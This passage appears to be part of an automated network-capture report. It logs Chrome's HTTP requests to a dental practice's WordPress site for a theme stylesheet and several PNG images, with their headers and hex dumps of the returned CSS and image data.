                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Tue, 09 Jun 2020 07:13:36 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 25878
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 64 65 6e 74 61 6c 68 65 61 6c 74 68 73 74 6f 70 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 76 65 72 79 70 61 75 6c 63 68 65 72 72 79 2e 63 6f 2e 75 6b 0a 41 75 74 68 6f 72 3a 20 56 65 72 79 20 50 61 75 6c 20 43 68 65 72 72 79 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 75 6e 64 65 72 73 63 6f 72 65 73 2e 6d 65 2f 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 44 65 73 63 72 69 70 74 69 6f 6e 0a 56 65 72 73 69 6f 6e 3a 20 31 2e 30 2e 30 0a 4c 69 63 65 6e 73 65 3a 20 47 4e 55 20 47 65 6e 65 72 61 6c 20 50 75 62 6c 69 63 20 4c 69 63 65 6e 73 65 20 76 32 20 6f 72 20 6c 61 74 65 72 0a 4c 69 63 65 6e 73 65 20 55 52 49 3a 20 4c 49 43 45 4e 53 45 0a 54 65 78 74 20 44 6f 6d 61 69 6e 3a 20 64 65
                                                                                                                                      Data Ascii: /*Theme Name: dentalhealthstopTheme URI: http://verypaulcherry.co.ukAuthor: Very Paul CherryAuthor URI: http://underscores.me/Description: DescriptionVersion: 1.0.0License: GNU General Public License v2 or laterLicense URI: LICENSEText Domain: de
                                                                                                                                      2024-04-24 10:13:29 UTC14994INData Raw: 74 68 2c 20 74 64 2c 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 63 61 6e 76 61 73 2c 20 64 65 74 61 69 6c 73 2c 20 65 6d 62 65 64 2c 20 0a 66 69 67 75 72 65 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 0a 6d 65 6e 75 2c 20 6e 61 76 2c 20 6f 75 74 70 75 74 2c 20 72 75 62 79 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 2c 0a 74 69 6d 65 2c 20 6d 61 72 6b 2c 20 61 75 64 69 6f 2c 20 76 69 64 65 6f 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 09 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73
                                                                                                                                      Data Ascii: th, td,article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary,time, mark, audio, video {margin: 0;padding: 0;border: 0;font-size: 100%;font: inherit;vertical-align: bas
                                                                                                                                      2024-04-24 10:13:29 UTC9982INData Raw: 67 20 69 6d 67 2c 0a 2e 73 69 6e 67 6c 65 2d 74 65 61 6d 2d 6d 65 6d 62 65 72 73 20 2e 66 65 61 74 75 72 65 2d 69 6d 67 20 69 6d 67 0a 7b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 2e 70 61 67 65 2d 74 65 6d 70 6c 61 74 65 2d 73 74 61 6e 64 61 72 64 20 2e 62 74 6e 2d 64 61 6e 67 65 72 2c 0a 2e 73 69 6e 67 6c 65 2d 74 65 61 6d 2d 6d 65 6d 62 65 72 73 20 2e 62 74 6e 2d 64 61 6e 67 65 72 20 7b 0a 09 77 69 64 74 68 3a 32 30 30 70 78 3b 0a 7d 0a 2e 70 61 67 65 2d 74 65 6d 70 6c 61 74 65 2d 73 74 61 6e 64 61 72 64 20 2e 73 69 64 65 62 61 72 2c 0a 2e 73 69 6e 67 6c 65 2d 74 65 61 6d 2d 6d 65 6d 62 65 72 73 20 2e 73 69 64 65 62 61 72 20 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 32 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 3b 0a 09 70
                                                                                                                                      Data Ascii: g img,.single-team-members .feature-img img{width:100%;}.page-template-standard .btn-danger,.single-team-members .btn-danger {width:200px;}.page-template-standard .sidebar,.single-team-members .sidebar {margin-top:32px;padding-top:32px;p


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      58192.168.2.164977791.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC400OUTGET /wp-content/themes/dentalhealthstop/images/dhs-icon.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1126
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 3c 08 06 00 00 00 3a fc d9 72 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 08 49 44 41 54 78 da d4 5b eb 91 da 30 10 f6 31 f7 9b f8 2a 88 3b c0 a9 00 a7 82 90 0a 0e 57 40 52 01 50 c1 71 15 00 15 c4 54 70 a6 82 98 0a ce a9 20 3e 1a 48 56 99 f5 8d a2 d1 5b b2 2c 34 a3 c1 83 8d a4 cf bb df be 24 ee 12 c3 76 bd 5e 53 f8 58 42 5f 41 cf 98 db 1d f4 0a fa 76 3a 9d b6 49 84 ed ce 02 ec 0b f4 5c e3 f1 1d 02 ef 6e 19 30 01 5b 18 fc 84 80 fd 0e a0 0f 2e 8b c4 17 fd fe 92 61 bc 7a 70 c0 30 e9 06 3e d6 96 f3 10 f5 de 12 75 d7 95 38 cc 47 5e ec 23 f4 05 f4 d4 17 75 4c 00 bf 72 38 4b 37 22 c5 23 82 cb a8 3e a7 ae 49 23 d2 39 c1
                                                                                                                                      Data Ascii: PNGIHDR<<:rtEXtSoftwareAdobe ImageReadyqe<IDATx[01*;W@RPqTp >HV[,4$v^SXB_Av:I\n0[.azp0>u8G^#uLr8K7"#>I#9
                                                                                                                                      2024-04-24 10:13:29 UTC224INData Raw: 9a b4 f8 18 b3 d1 4a 18 7f ca b6 7e 97 e0 59 73 98 37 81 14 1b 89 ba 07 05 fc 41 23 cb 31 c9 70 5a 01 e0 2e 16 09 67 12 fe 66 78 df a4 1c d3 f8 e0 e9 90 80 2f 92 7b 0b 43 75 ee 37 e9 12 9d 2a 48 8c 46 6b 8e 71 73 6b f8 bb 9a e3 73 1b c6 26 44 09 38 d7 f0 bd 5a fe dc e7 a9 fa 41 b6 5a 90 bf a9 e5 49 f8 8b a0 78 10 17 60 86 77 79 e2 50 3b 56 24 29 e3 01 66 8e 31 15 cc 02 6d cb 31 3b c9 56 ec 39 06 0e 6f 39 39 6f 65 73 68 54 c2 d7 c2 67 4e ec 23 66 7e 21 27 e6 7d 04 f7 82 f1 7f e2 7f 2e a2 71 4b 25 5a d7 f5 00 60 33 a4 48 99 c4 d4 88 d1 c2 ad 93 cc f3 b8 3f f0 e4 6c 7c 0d 41 2f 3d 8e b7 f4 0d f6 af 00 03 00 8b b1 a6 5d 0a 9f 10 b4 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: J~Ys7A#1pZ.gfx/{Cu7*HFkqsks&D8ZAZIx`wyP;V$)f1m1;V9o99oeshTgN#f~!'}.qK%Z`3H?l|A/=]IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      59192.168.2.164978191.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC385OUTGET /wp-content/uploads/2017/03/reason-2.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 2213
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 08 47 49 44 41 54 78 da ec 9d ff 71 e2 38 14 c7 05 73 ff 1f 57 c0 cd 39 15 84 54 10 a8 00 53 01 50 41 92 0a 02 15 84 54 00 5b 41 d8 0a f0 56 b0 6c 05 e1 e6 0a 38 ae 02 4e e2 9e 77 72 bb 20 c9 b6 64 3d 89 ef 77 c6 c3 ce ac 63 6c f1 d1 fb 3e c9 fa d1 11 50 2b fa fd d7 79 5f 7e a8 e3 96 3e 33 3a 2e e9 20 8f 9d 3c f6 f2 f8 a6 fe fd d7 3f f3 22 f4 73 74 f0 53 7a 85 24 97 1f 23 79 0c 0c 70 d8 4a 41 a4 a0 f9 2c 8f 8d 04 e8 00 60 2a ea 78 3c f6 3b 9d ce 8e 11 24 3d f9 f1 28 8f 89 23 48 74 f0 6c e4 b1 90 e0 ec 01 8c 19 14 55 6b 57 f4 a3 ec 24 34 77 0c
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<GIDATxq8sW9TSPAT[AVl8Nwr d=wcl>P+y_~>3:. <?"stSz$#ypJA,`*x<;$=(#HtlUkW$4w
                                                                                                                                      2024-04-24 10:13:29 UTC1311INData Raw: 7e ca 1e db 31 c3 c4 b6 6a 81 7d 16 69 68 a3 69 31 b9 8d 30 ea 45 21 b5 7e 6c 2e 5c be 34 8c 29 8c 5f b2 23 f5 62 6f 93 02 2d d4 62 da 68 6c 79 e0 04 18 82 65 2b ec 46 c5 2f d5 94 0f 66 7d 2b a6 fc 65 60 a8 95 29 e9 4b 8d 4a f3 5d bf 58 7e c9 4a d8 0d d0 19 47 90 ab 9c 53 bf 66 01 c7 28 dd ef 73 db 38 c2 d0 db 65 9b f1 20 37 91 c2 22 0c 95 61 97 12 2d 94 bc 5f ca 63 b2 c6 c0 58 64 cf 4f 11 25 b6 97 74 af 29 e0 a4 80 31 54 02 63 8f af 8d 25 e9 7c 2d aa 5c a5 86 f6 78 ae 0a 11 86 06 66 f7 34 c9 6d ca b0 a4 0c cc 9f 9a 06 40 d6 c4 92 fa 57 d0 37 61 d5 3a b8 22 35 02 a6 6e a2 08 25 2a 2d 30 86 56 cf 28 a1 72 38 00 05 07 c0 18 7c 7c 4a 1d 7a 29 b7 1a ae 51 bb a6 c0 e8 a2 cc 36 21 68 6a 35 33 23 d5 1f 9a 6e 84 43 53 60 3e 19 f2 98 14 a0 39 5c 59 9e 96 79 b3 24
                                                                                                                                      Data Ascii: ~1j}ihi10E!~l.\4)_#bo-bhlye+F/f}+e`)KJ]X~JGSf(s8e 7"a-_cXdO%t)1Tc%|-\xf4m@W7a:"5n%*-0V(r8||Jz)Q6!hj53#nCS`>9\Yy$


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      60192.168.2.164978291.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC650OUTGET /wp-content/themes/dentalhealthstop/images/dhs-logo-footer.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 6532
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 55 00 00 00 a4 08 06 00 00 00 be 57 db 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 19 26 49 44 41 54 78 da ec 9d d1 75 9b 48 17 c7 89 4f de a3 ef d9 0f ab 54 10 a5 02 e3 0a e2 54 10 b9 02 c7 15 d8 ae 20 76 05 96 2b 88 5c 41 70 05 51 2a 08 fb a0 e7 d5 56 b0 1f 37 be ec 12 8c 60 98 19 60 40 bf df 39 1c 47 8a 80 99 e1 c2 fc b9 73 e7 4e 14 01 00 00 00 80 33 af 7c 1c 64 bb dd ce b3 3f f3 a6 df 1d 1f 1f 27 34 39 00 00 00 20 aa 7e 17 52 b3 ec cf 59 b6 7d ca b6 b8 c5 ae 9b 6c 13 71 f5 90 89 ac 0d 97 00 00 00 00 0e 52 54 65 62 2a 56 21 b5 f4 70 fe 34 db ee b2 6d 95 09 ac 1d 97 03 00 00 00 26 2f aa d4 33 75 1f 3d 7b a7 7c 23 82 ea 2e
                                                                                                                                      Data Ascii: PNGIHDRUW'tEXtSoftwareAdobe ImageReadyqe<&IDATxuHOTT v+\ApQ*V7``@9GsN3|d?'49 ~RY}lqRTeb*V!p4m&/3u={|#.
                                                                                                                                      2024-04-24 10:13:29 UTC5630INData Raw: 15 00 00 40 58 bc de 23 20 5c 44 d5 9f 03 0b 29 f1 fa 2c 55 4c b9 d4 23 17 52 9d 2e d4 ac de ae 8f 9a ce 61 d9 a6 9e 21 79 03 01 00 00 10 55 2f 91 c5 88 e3 b1 55 c4 d3 10 9f 88 27 89 07 5b f7 9d 63 4b bc 7b 5a 87 18 b3 04 00 00 98 86 a8 4a 1d 8f f9 a6 a5 18 ca 67 c4 ad 6d 3c 2f 1e 86 f8 92 82 90 4a 07 be 1e 37 a6 f5 c0 4b 05 00 00 30 7d 51 d5 76 66 9a 9c ef 7b b6 dd 67 02 49 04 ce 93 0a 9d 5d 95 b7 48 73 4b cd a3 e7 45 94 6d 53 14 c8 f1 1f 6c 85 5c 57 c8 2c 42 6d 83 26 61 85 a0 02 00 00 08 8c ca 60 67 c7 19 80 49 26 0e 5a ad 4d a7 69 06 ee 3b ae ab 08 91 55 f4 9c 02 21 0d f5 82 18 2e 6a 1d cc 64 00 00 00 00 78 e6 68 cf f7 7d c7 13 89 d8 39 8f ba f1 c0 48 b0 f9 c7 ec 1c 92 e6 e1 32 64 41 a5 6d 91 44 cd de c2 47 4c 17 00 00 60 1c a2 2a 71 38 a6 55 62 4a 15
                                                                                                                                      Data Ascii: @X# \D),UL#R.a!yU/U'[cK{ZJgm</J7K0}Qvf{gI]HsKEmSl\W,Bm&a`gI&ZMi;U!.jdxh}9H2dAmDGL`*q8UbJ


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      61192.168.2.164978391.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC385OUTGET /wp-content/uploads/2017/03/reason-1.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 3105
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0b c3 49 44 41 54 78 da ec 9d ed 71 db 38 10 86 29 4f fe 47 57 c0 4d 78 15 98 a9 40 74 05 91 2b b0 54 c1 d9 15 44 ae 40 56 05 56 2a 88 52 81 e8 0a 2c 57 20 dd 5c 01 e6 55 e0 e3 3a ab 1c 4f 43 7c 2f 40 80 da 9d d1 24 e3 44 34 08 3c 78 f7 83 00 38 ca 7a b0 b7 b7 b7 69 f3 c7 a4 f9 14 cd a7 14 fc b7 aa f9 1c 9a cf 0b fc 7d 34 1a ed b2 1e ad 69 f3 b8 d5 de 4b fc 7b de f1 5f a1 cd d0 d6 a7 18 da 7d 6a bf 7f 5c e4 78 0f 13 ec db cd df ff 2c 0e ba df 1f 05 ec 70 68 e4 4d f3 01 58 c6 96 97 a9 5a 03 51 05 00 e4 d8 b1 25 02 62 63 30 18 df 9a cf ba 69 f3
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<IDATxq8)OGWMx@t+TD@VV*R,W \U:OC|/@$D4<x8zi}4iK{_}j\x,phMXZQ%bc0i
                                                                                                                                      2024-04-24 10:13:29 UTC2203INData Raw: 14 b0 6c 63 ec 57 76 49 e1 61 39 2e ab ac 05 b0 c0 35 bf c7 3a 09 2f 2c 6e 96 61 71 9b fd c2 65 95 ad dd 17 d1 26 17 a6 c0 ec 18 16 27 58 ee 15 0b b6 97 59 d8 2d 34 1c c3 44 0c 4b 25 5b 5a 89 0b ea 67 b1 f7 03 15 30 05 c3 a2 74 e5 d7 96 df 4d 7a 79 c3 d9 b9 24 3c 80 c7 35 63 b9 d6 58 e1 5f a4 10 37 1a 01 23 5b ef 82 92 3a 34 58 28 32 96 7b cd b5 b8 e3 14 80 b1 59 de b0 13 cc 86 b1 c7 41 83 19 fe 23 23 3a e3 c4 f0 f7 ba b8 db 9d c1 96 90 4b c1 cf 5f 52 8f 61 ea 90 71 0c 02 02 45 2e d8 b7 f3 0a 0f f8 f0 3c 14 df e6 9a b1 98 c6 2d a2 54 fa 90 3a 30 4f 86 33 84 02 9a 76 65 14 32 89 6d 03 cd 33 ae 3b f1 a1 2e 26 0b b5 65 ae c8 64 b0 8b 14 80 31 de 66 22 79 20 06 67 a5 fc e1 d9 4d 74 2d 1f 80 99 bc 6e 3e 2b c3 01 12 fd 0e d1 fd 99 a6 d0 57 06 7d 5a 66 82 3d ea
                                                                                                                                      Data Ascii: lcWvIa9.5:/,naqe&'XY-4DK%[Zg0tMzy$<5cX_7#[:4X(2{YA##:K_RaqE.<-T:0O3ve2m3;.&ed1f"y gMt-n>+W}Zf=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      62192.168.2.164978491.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC385OUTGET /wp-content/uploads/2017/03/reason-3.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1598
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 05 e0 49 44 41 54 78 da ec 9d 8d 75 da 30 14 46 6d 26 a0 13 94 4c 50 98 20 ce 04 4d 37 08 13 34 4c d0 74 02 e8 04 c9 06 a4 13 90 4e 80 3b 01 74 02 b3 01 b5 9a e7 c6 c7 04 5b b6 65 59 32 f7 9e a3 03 6d 30 c8 d2 e7 f7 23 ac 47 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 25 f4 ad c3 c7 e3 71 92 3e 4c a5 5d a7 6d 2c cf cb d8 4b fb 95 b6 97 30 0c 5f 0c f5 25 4a 1f 22 e9 c7 44 5a 19 d9 e7 aa 7e c4 aa a5 7d d9 23 43 f3 22 b9 4d db 32 6d bb a3 19 92 b4 3d 8a f8 6a 0b 56 8e 4d
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<IDATxu0Fm&LP M74LtN;t[eY2m0#G%q>L]m,K0_%J"DZ~}#C"M2m=jVM
                                                                                                                                      2024-04-24 10:13:29 UTC696INData Raw: d6 ec 54 92 73 17 60 c1 35 6b 6e d9 d9 59 df ae 22 4a d6 e5 9e e9 ec 7c 3e ee 6b cc c7 d4 87 4e ae d9 bd d7 99 b5 5f 7b 73 f1 d6 ec ec 0e 17 65 dc 05 d5 d9 5e bc 76 45 e1 75 f7 44 2f b1 36 ad c7 7c d9 60 8f f6 d8 95 13 98 36 dc 64 8e b5 e9 de aa f4 1b b7 94 9c c8 43 c3 4d e6 eb 26 85 7d 2e 50 28 93 9a ee 3f cf 83 ab 27 b5 69 51 9d 00 37 65 ce fd f4 b3 de d2 f0 e4 12 df 4b 5a 38 34 96 0f 06 c6 73 ec fa 89 46 7d d6 a0 1b 88 eb 31 55 43 2f f2 e5 a4 97 47 73 ac 2f a1 60 a0 14 2f 5a 1b 1c b7 a5 6f 03 60 ba 4e dd 6e 68 05 03 73 85 1f 4d 97 6a db fa ea 83 bb 2a 45 e6 ad 78 3a 14 89 95 b8 a5 eb fa 30 ca 87 76 1d a5 ab db 0b 5e 82 d7 0a 05 b1 e9 9b 90 4c 08 24 78 db d0 ae 5c 6b d7 41 e8 4d 97 f7 dd 84 16 06 4c ad 01 7c b3 38 47 d9 0d 4b 59 25 8a bd 2d 11 15 6e 31
                                                                                                                                      Data Ascii: Ts`5knY"J|>kN_{se^vEuD/6|`6dCM&}.P(?'iQ7eKZ84sF}1UC/Gs/`/Zo`NnhsMj*Ex:0v^L$x\kAML|8GKY%-n1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      63192.168.2.164978591.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
